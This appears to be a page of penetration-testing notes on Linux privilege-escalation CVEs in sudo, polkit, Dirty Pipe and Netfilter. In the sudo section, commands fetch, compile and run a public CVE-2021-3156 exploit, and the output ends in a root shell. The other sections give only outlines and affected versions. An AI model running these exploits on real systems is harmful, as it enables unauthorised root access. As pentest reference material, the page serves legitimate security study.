search

Recent 0-Days

hashtag
Sudo

The /etc/sudoers file specifies which users or groups are allowed to run specific programs and with what privileges.

$ sudo cat /etc/sudoers | grep -v "#" | sed -r '/^\s*$/d'

hashtag
CVE-2021-3156

  • 1.8.31 - Ubuntu 20.04

  • 1.8.27 - Debian 10

  • 1.9.2 - Fedora 33

  1. Check sudo version

    $ sudo -V | head -n1

Sudo version 1.8.31

  2. Download and compile the PoC

    $ git clone https://github.com/blasty/CVE-2021-3156.git
$ cd CVE-2021-3156
$ make

rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c

  3. Check the exploit

    $ ./sudo-hax-me-a-sandwich

** CVE-2021-3156 PoC by blasty <peter@haxx.in>

  usage: ./sudo-hax-me-a-sandwich <target>

  available targets:
  ------------------------------------------------------------
    0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27
    1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
    2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28
  ------------------------------------------------------------

  manual mode:
    ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>

  4. Check the OS Version so we know the <target>

    $ cat /etc/lsb-release

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=20.04
DISTRIB_CODENAME=focal
DISTRIB_DESCRIPTION="Ubuntu 20.04.1 LTS"

  5. Exploit

    $ ./sudo-hax-me-a-sandwich 1

** CVE-2021-3156 PoC by blasty <peter@haxx.in>

using target: Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
** pray for your rootshell.. **

# id

uid=0(root) gid=0(root) groups=0(root)

hashtag
CVE-2019-14287

Affected Versions: < 1.8.28

hashtag
Pre-requisites

  • It had to allow a user in the /etc/sudoers file to execute a specific command (and this command is the one that will be run as root)

hashtag
Sample Scenario

  1. Check sudo privileges

  2. Use the -1 id when executing sudo

hashtag
Polkit

PolicyKit (polkit) is an authorization service on Linux-based operating systems that allows user software and system components to communicate with each other if the user software is authorized to do so. To check whether the user software is authorized for this instruction, polkit is asked.

Polkit works with two groups of files.

  1. actions/policies (/usr/share/polkit-1/actions)

  2. rules (/usr/share/polkit-1/rules.d)

The most interesting functionality is pkexec because it acts similary to sudo

hashtag
CVE-2021-4034

  1. Download and compile the exploit

  2. Run the exploit

hashtag
Dirty Pipe

hashtag
CVE-2022-0847

Affected Versions: 5.8 - 5.17

  1. Download and compile the exploit

  2. We can use 2 exploits

    1. The first exploit version (exploit-1) modifies the /etc/passwd and gives us a prompt with root privileges

      1. Verify kernel version

      2. Run exploit 1

    2. The 2nd exploit version (exploit-2), we can execute SUID binaries with root privileges.

      1. Find binaries with SUID set

      2. Run exploit 2 with the binary as the parameter

hashtag
Net Filter

Netfilter is a Linux kernel module that provides, among other things, packet filtering, network address translation, and other tools relevant to firewalls

This kernel module has three main functions:

  1. Packet defragmentation

  2. Connection tracking

  3. Network address translation (NAT)

When the module is activated, all IP packets are checked by the Netfilter before they are forwarded to the target application of the own or remote system. In 2021 (CVE-2021-22555arrow-up-right), 2022 (CVE-2022-1015arrow-up-right), and also in 2023 (CVE-2023-32233arrow-up-right), several vulnerabilities were found that could lead to privilege escalation.

CVE-2021-22555

Vulnerable kernel versions: 2.6 - 5.11

CVE-2022-25636

Vulnerable Kernel Versions: 5.4 through 5.6.10

CVE-2023-32233

Vulnerable Kernel Versions: up to version 6.3.1

PreviousPython Library HijackingNextWindows

Last updated